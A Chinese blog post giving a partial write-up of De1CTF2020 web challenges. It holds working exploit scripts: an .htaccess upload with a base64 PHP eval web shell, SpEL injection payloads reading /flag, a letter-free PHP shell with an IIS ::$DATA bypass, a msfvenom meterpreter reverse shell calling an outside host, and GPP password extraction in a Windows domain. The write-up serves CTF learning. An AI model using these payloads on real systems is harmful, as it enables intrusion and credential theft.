<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="De1CTF2020-部分writeup, M0on&#39;s Blog">
    <meta name="description" content="De1CTF2020-部分writeup">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>De1CTF2020-部分writeup | M0on&#39;s Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>
    
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="M0on's Blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">M0on's Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">M0on's Blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>

        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/15.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">De1CTF2020-部分writeup</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web/">
                                <span class="chip bg-color">web</span>
                            </a>
                        
                            <a href="/tags/writeup/">
                                <span class="chip bg-color">writeup</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-05-04
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    1.5k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    7 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>

        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="check-in"><a href="#check-in" class="headerlink" title="check in"></a>check in</h2><p>web签到题，很友好，是考烂了的知识点</p>
<p>上传<code>.htaccess</code>,然后就是简单的换行绕过</p>
<pre><code>import requests

url='http://129.204.21.115/index.php'

file='''#define width 1337
#define height 1337

AddType application/x-httpd-p\\
hp .wuwu
p\\
hp_value a\\
uto_append_file "p\\
hp://filter/convert.bas\\
e64-decode/resource=shell.wuwu"'''.replace('\r\n','\n')
print(file)
data={'upload':'submit'}
files = {'fileUpload': ('.htaccess', file, 'image/png')}
req=requests.post(url=url,files=files,data=data)
print(req.text)

file='''#define width 1337\n#define height 1337PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='''
#PD9waHAgcGhwaW5mbygpOz8+
file='''#define width 1337\n#define height 13371PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='''
data={'upload':'submit'}
files = {'fileUpload': ('shell.wuwu', file, 'image/png')}
req=requests.post(url=url,files=files,data=data)
print(req.text)</code></pre><p>然后去页面post cmd执行命令</p>
<p>flag:</p>
<pre><code>De1ctf{cG1_cG1_cg1_857_857_cgll111ll11lll}</code></pre><p>后来出题人说了这个是非预期，醉了，估计国内师傅基本是非预期做的，预期是用cgi执行命令</p>
<p>据说外国师傅们用预期做的要骂人</p>
<h2 id="calc"><a href="#calc" class="headerlink" title="calc"></a>calc</h2><p>目标是读取 <code>/flag</code></p>
<p>这个执行计算看到<code>/spel/calc?calc=1-1</code>，简直是明示了，<code>spel</code>表达式注入</p>
<p>经过测试ban了一些东西</p>
<pre><code>new
T(
instanceof
getClass
lang
Runtime
# </code></pre><p><code>Runtime</code>和<code>lang</code>这个类型的还可以通过字符串拼接绕过，但是最关键的是<code>T(</code>没了，代表着无法实例化</p>
<p>所以结合目标读取<code>/flag</code>，就是寻找一个静态调用的方法来读取文件</p>
<p>本地测试，最终找到了</p>
<p><code>System.out.println((java.nio.file.Files.readAllLines(java.nio.file.Paths.get("/etc/passwd"))));</code></p>
<p>这个样子的</p>
<p>有一个终极大坑</p>
<p>开始用的是</p>
<p><code>System.out.println((java.nio.file.Files.readAllBytes(java.nio.file.Paths.get("/etc/passwd"))));</code></p>
<p>得到结果<code>[B@1540e19d</code>，一开始想错了，以为这个是异步，就去找静态的获取异步</p>
<p>后来没找到，突然发现<code>new String()</code>能获取这个的值才发现是<code>readAllBytes</code>是写入内存的，就这都卡了一个小时</p>
<p>所以直接换成<code>readAllLines</code></p>
<p>脚本</p>
<pre><code>import requests
import urllib
session = requests.session()

burp0_url = "http://106.52.164.141:80/spel/calc"

payload="''['class'].forName('java.la'+'ng'+'.Runti'+'me').getDeclaredMethods()[15]"
payload="T%28java.lang.Runtime)".replace('a','%61').replace('i','%69')
payload="hasAuthority('/flag')"
#payload="hasRole()"
payload="{{'a'}}.stream()"
payload="''.class.forName('java.'+'lang.'+'Runtim'+'e').getMethod()"
payload="''.class.forName('java.io.File').listRoots()"

payload="''.class.forName('java.nio.file.Files').readAllLines(''.class.forName('java.nio.file.Paths').get('/flag'))"


print(payload)
param={'calc':payload}

req=session.get(burp0_url,params=param)
print(req.text)
</code></pre><p>flag</p>
<p>De1CTF{NobodyKnowsMoreThanTrumpAboutJava}</p>
<h2 id="Hard-pentest1"><a href="#Hard-pentest1" class="headerlink" title="Hard_pentest1"></a>Hard_pentest1</h2><p>第一层</p>
<p>主要是绕过</p>
<pre><code>!preg_match('/[a-z0-9;~^`&amp;|]/is',$file_content)
和
php后缀</code></pre><p>随便上传一个文件，看到<code>IIS8.5</code>，用<code>::$DATA</code>绕过后缀</p>
<p>然后正则</p>
<pre><code>&lt;?=$_=!!"_".""?&gt;  //1
&lt;?=$__=!!"".""?&gt; //false

&lt;?=@$___=$_/$__?&gt; // 得到INF</code></pre><p>得到字符串后面就简单了，只要截取再用php自增就可以了</p>
<pre><code>import requests
url='http://47.113.219.76/index.php'

import re

file='''&lt;?=$_=!!"_".""?&gt;

&lt;?=$__=!!"".""?&gt;

&lt;?=@$___=$_/$__?&gt;
&lt;?=$____="".$___.""?&gt;

&lt;?=$____=$____{$_}?&gt;
&lt;?=$_____=++$____?&gt; 

&lt;?=$______=++$_____?&gt; 
&lt;?=$_______=++$_____?&gt; 
&lt;?=$_______=++$_______?&gt; 
&lt;?=$________=++$_______?&gt;  
&lt;?=$_________=++$________?&gt;

&lt;?=$_='_'.$______.$____.$_______.$_________?&gt;

&lt;?=$$_[_]($$_[__])?&gt;'''
print(file)
data={'submit':'submit'}
files = {'file': ('1.php::$DATA', file, 'application/octet-stream')}

req=requests.post(url=url,files=files,data=data)

print(req.content)

st=re.findall('in:(uploads.*\s)',req.text)
print()
print(st[0].strip())

</code></pre><p>然后是windows的域渗透</p>
<p>先弹个meterpreter的shell</p>
<pre><code>msfvenom -p windows/meterpreter/reverse_tcp  lhost=mu27062382.zicp.vip lport=23561 -a x86 --platform win -f exe -o /tmp/v.exe

use exploit/multi/handler 
set payload  windows/meterpreter/reverse_tcp
set lport 4444
set lhost mu27062382.zicp.vip
run
execute  -H -i -f cmd.exe
</code></pre><p>上传<code>nbtscan-1.0.35.exe</code>扫描</p>
<pre><code>nbtscan-1.0.35.exe -m 192.168.0.0/24
192.168.0.11    DE1CTF2020\DM                   00:16:3e:03:68:c5 SHARING
192.168.0.12    DE1CTF2020\DC                   00:16:3e:03:1a:de SHARING</code></pre><p>后面timeout了， 可能工具有问题</p>
<p>后来想上传个<code>nmap</code>来使用nmap脚本，结果太大了上传失败，只好继续用msf</p>
<p>net命令在原本目录没有，需要到<code>C:\Windows\System32&gt;</code></p>
<p>然后</p>
<p><a href="https://wh0ale.github.io/2018/12/19/2018-12-19-%E5%9F%9F%E6%B8%97%E9%80%8F/" target="_blank" rel="noopener">https://wh0ale.github.io/2018/12/19/2018-12-19-%E5%9F%9F%E6%B8%97%E9%80%8F/</a></p>
<p>认真看了这篇文章，再看了下命令</p>
<pre><code>C:\Windows\system32&gt;net view \\192.168.0.12
net view \\192.168.0.12
Shared resources at \\192.168.0.12



Share name  Type  Used as  Comment              

-------------------------------------------------------------------------------
Hint        Disk                                
NETLOGON    Disk           Logon server share   
SYSVOL      Disk           Logon server share   
The command completed successfully.
</code></pre><p>然后<code>net use q: \\ip</code> 来映射到本机的<code>q:</code>盘</p>
<pre><code>net use q: \\192.168.0.12\Hint
net use r: \\192.168.0.12\NETLOGON
net use s: \\192.168.0.12\SYSVOL 
</code></pre><p><img src="../../../../../../../images/De1CTF2020/show-mount.png" alt=""></p>
<p>然后exit会meterpreter的shell</p>
<p>到<code>q:</code>看看</p>
<p><img src="../../../../../../../images/De1CTF2020/q-pan.png" alt=""></p>
<p>下载下来</p>
<p>再去<code>s:</code>看看</p>
<p><img src="../../../../../../../images/De1CTF2020/s-pan.png" alt=""></p>
<p>然后后来在执行<code>net user /domain</code>的时候看到了</p>
<pre><code>C:\Windows\System32&gt;net user /domain
net user /domain
The request will be processed at a domain controller for domain De1CTF2020.lab.


User accounts for \\dc.De1CTF2020.lab

-------------------------------------------------------------------------------
Administrator            De1ta                    Guest                    
HintZip_Pass             krbtgt                   web                      
The command completed successfully.</code></pre><p>zip的密码应该就是<code>HintZip_Pass</code>用户的密码</p>
<p>然后继续看文章</p>
<p>看到<code>组策略首选项</code>，一开始完美错过了，后来注意到<code>SYSVOL</code>才锁定这里,</p>
<h3 id="组策略首选项"><a href="#组策略首选项" class="headerlink" title="组策略首选项"></a>组策略首选项</h3><p><strong>GPP的全名是组策略首选项，是为了满足管理活动目录的需要存在的，GPP的操作对象是组策略对象（GPO），在所有计算机上更新密码或者指定新的管理员，就会使用这个机制更新。GPP发布的账号信息全部存储在\[Domain Controller]\SYSVOL[Ddomain]\Policies中。可以在该文件夹找到一个名为Groups.xml的文件。若能找到该文件，就可以在Groups.xml文件找到cpassword的哈希值。然后使用gpprefdecrypt.py解密GPP中本地管理员账户的密码，或者使用msf中的post/windows/gather/credentials/gpp获取本地管理员账号。</strong></p>
<p>用msf的后渗透模块也可以</p>
<p>设置好配置domains是De1CTF2020</p>
<p><img src="../../../../../../../images/De1CTF2020/gpp.png" alt=""></p>
<p>得到密码<code>zL1PpP@sSwO3d</code></p>
<p>去打开zip</p>
<p>zip在linux解不开，去window解</p>
<p>打开flag和hint</p>
<p>flag</p>
<p>De1CTF{GpP_11Is_SoOOO_Ea3333y}</p>
<p><a href="https://www.andreafortuna.org/2019/02/13/abusing-group-policy-preference-files-for-password-discovery/" target="_blank" rel="noopener">https://www.andreafortuna.org/2019/02/13/abusing-group-policy-preference-files-for-password-discovery/
</a></p>
<p><a href="https://wh0ale.github.io/2018/12/19/2018-12-19-%E5%9F%9F%E6%B8%97%E9%80%8F/" target="_blank" rel="noopener">https://wh0ale.github.io/2018/12/19/2018-12-19-%E5%9F%9F%E6%B8%97%E9%80%8F/
</a></p>
<p><a href="https://blog.netspi.com/5-ways-to-find-systems-running-domain-admin-processes/" target="_blank" rel="noopener">https://blog.netspi.com/5-ways-to-find-systems-running-domain-admin-processes/
</a></p>
<p><a href="https://www.c0bra.xyz/2020/03/05/%E5%9F%9F%E6%B8%97%E9%80%8F-%E7%BB%84%E7%AD%96%E7%95%A5%E6%9C%89%E5%85%B3%E5%AD%A6%E4%B9%A0/" target="_blank" rel="noopener">https://www.c0bra.xyz/2020/03/05/%E5%9F%9F%E6%B8%97%E9%80%8F-%E7%BB%84%E7%AD%96%E7%95%A5%E6%9C%89%E5%85%B3%E5%AD%A6%E4%B9%A0/
</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://mo0n.top" rel="external nofollow noreferrer">m0on</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://mo0n.top/2020/05/04/de1ctf2020-bu-fen-writeup/">http://mo0n.top/2020/05/04/de1ctf2020-bu-fen-writeup/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="http://mo0n.top" target="_blank">m0on</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web/">
                                    <span class="chip bg-color">web</span>
                                </a>
                            
                                <a href="/tags/writeup/">
                                    <span class="chip bg-color">writeup</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2020/05/04/de1ctf2020-bu-fen-writeup/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/15.jpg" class="responsive-img" alt="De1CTF2020-部分writeup">
                        
                        <span class="card-title">De1CTF2020-部分writeup</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            De1CTF2020-部分writeup
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-05-04
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            m0on
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/writeup/">
                        <span class="chip bg-color">writeup</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/04/21/ha1cyon-ctf2020-writeup/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/14.jpg" class="responsive-img" alt="Ha1cyonCTF2020-部分writeup.md">
                        
                        <span class="card-title">Ha1cyonCTF2020-部分writeup.md</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            Ha1cyonCTF2020-部分writeup
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-04-21
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/web/" class="post-category">
                                    web
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/writeup/">
                        <span class="chip bg-color">writeup</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>



    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="http://mo0n.top" target="_blank">m0on</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">15.3k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Global site tag (gtag.js) - Google Analytics -->


    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    
    
    <script type="text/javascript" size="150" alpha='0.6'
        zIndex="-1" src="/libs/background/ribbon-refresh.min.js" async="async"></script>
    

    
    <script type="text/javascript" src="/libs/background/ribbon-dynamic.js" async="async"></script>
    
    
    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
